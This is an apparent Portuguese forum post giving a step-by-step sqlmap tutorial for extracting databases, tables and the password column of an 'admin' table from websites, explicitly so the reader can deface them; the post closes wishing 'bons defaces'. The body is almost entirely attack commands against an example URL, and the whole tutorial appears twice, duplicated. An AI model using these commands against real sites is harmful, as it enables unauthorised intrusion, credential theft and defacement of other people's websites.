Neste ' Post ' vou ensinar como descobrir informacoes (pass's, users, etc) de sites para depois se quiser fazer defaces.
Ja tem de ter o SqlMap instalado. eu nao vou ensinar a instalar.
Entao vamos la:
primeiro abram o terminal/consola e escrevam cd e o diretorio (lugar) onde esta guardado o ficheiro /sqlmap
Ex: cd Downloads/sqlmap
depois escrevam
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' --dbs
depois se for vulneravel aparecerá: information_schema e pelo menos mais outro (Ex: mysql)
ai escolha sempre o que nao for "information_schema"
e seguimos assim:
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' -D mysql --tables
depois se conseguirmos as tables e por exemplo aparecer la uma a dizer: admin
escrevemos:
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' -T admin --columns
se conseguirmos alguma coisa(ex: id, nome, senha) escrevemos assim:
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' -T admin -C senha -U test --dump
e pronto aparecerá as passwords
__________________
espero ter ajudado e bons defaces
Ja tem de ter o SqlMap instalado. eu nao vou ensinar a instalar.
Entao vamos la:
primeiro abram o terminal/consola e escrevam cd e o diretorio (lugar) onde esta guardado o ficheiro /sqlmap
Ex: cd Downloads/sqlmap
depois escrevam
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' --dbs
depois se for vulneravel aparecerá: information_schema e pelo menos mais outro (Ex: mysql)
ai escolha sempre o que nao for "information_schema"
e seguimos assim:
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' -D mysql --tables
depois se conseguirmos as tables e por exemplo aparecer la uma a dizer: admin
escrevemos:
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' -T admin --columns
se conseguirmos alguma coisa(ex: id, nome, senha) escrevemos assim:
./sqlmap.py -u 'http://exemplo.com/noticia.php?id=236' -T admin -C senha -U test --dump
e pronto aparecerá as passwords
__________________
espero ter ajudado e bons defaces
Comment